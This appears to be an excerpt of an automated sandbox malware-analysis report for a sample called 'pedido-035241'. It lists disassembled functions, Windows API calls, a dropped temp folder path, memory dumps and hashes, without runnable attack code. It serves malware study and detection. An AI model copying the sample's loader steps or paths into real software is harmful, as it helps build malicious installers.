                                                                                                                                                                            • API String ID: 1716503409-678247507
                                                                                                                                                                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                            • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                                                                                                                                                                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                            • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                                                                                                                                                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 810 4015c1-4015d5 call 402da6 call 405e81 815 401631-401634 810->815 816 4015d7-4015ea call 405e03 810->816 818 401663-4022f6 call 401423 815->818 819 401636-401655 call 401423 call 406507 SetCurrentDirectoryW 815->819 824 401604-401607 call 405ab5 816->824 825 4015ec-4015ef 816->825 834 402c2a-402c39 818->834 835 40292e-402935 818->835 819->834 837 40165b-40165e 819->837 833 40160c-40160e 824->833 825->824 830 4015f1-4015f8 call 405ad2 825->830 830->824 841 4015fa-4015fd call 405a38 830->841 839 401610-401615 833->839 840 401627-40162f 833->840 835->834 837->834 843 401624 839->843 844 401617-401622 GetFileAttributesW 839->844 840->815 840->816 846 401602 841->846 843->840 844->840 844->843 846->833
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                              • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene, xrefs: 00401640
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene
                                                                                                                                                                            • API String ID: 1892508949-4197813180
                                                                                                                                                                            • Opcode ID: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
                                                                                                                                                                            • Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
                                                                                                                                                                            • Opcode Fuzzy Hash: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
                                                                                                                                                                            Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040663C,80000002), ref: 0040641B
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 00406426
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                            • String ID: : Completed
                                                                                                                                                                            • API String ID: 3356406503-2954849223
                                                                                                                                                                            • Opcode ID: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
                                                                                                                                                                            • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                                                                                                                                                                            • Opcode Fuzzy Hash: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
                                                                                                                                                                            • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                                                                                                                                                                            Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                                                                                                                                            • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                                                                                                                                                                            • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                                                                                                                                            • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                                                                                                                                                                            Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                                                                                                                                            • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                                                                                                                                                                            • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                                                                                                                                            • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                                                                                                                                                                            Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                                                                                                                                            • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                                                                                                                                            • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                                                                                                                                                                            Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                                                                                                                                            • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                                                                                                                                                                            • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                                                                                                                                            • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                                                                                                                                                                            Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                                                                                                                                            • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                                                                                                                                                                            • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                                                                                                                                            • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
                                                                                                                                                                            Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                                                                                                                                            • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                                                                                                                                                                            • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                                                                                                                                                                            Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                                                                                                                                            • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                                                                                                                                                                            • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                                                                                                                                            • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                                                                                                                                                                            Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 334405425-0
                                                                                                                                                                            • Opcode ID: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
                                                                                                                                                                            • Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
                                                                                                                                                                            • Opcode Fuzzy Hash: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
                                                                                                                                                                            • Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D
                                                                                                                                                                            Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFreelstrcatlstrlen
                                                                                                                                                                            • String ID: ExecToStack
                                                                                                                                                                            • API String ID: 3292104215-166031814
                                                                                                                                                                            • Opcode ID: 3068f9b91c3f4162d0930761ac5c94cf9212319f1563e24b4ffc4f3e6270dea2
                                                                                                                                                                            • Instruction ID: e925a152a6e0f7021576dd296752ea90fe74f89098b2d6bde03e837448aacd47
                                                                                                                                                                            • Opcode Fuzzy Hash: 3068f9b91c3f4162d0930761ac5c94cf9212319f1563e24b4ffc4f3e6270dea2
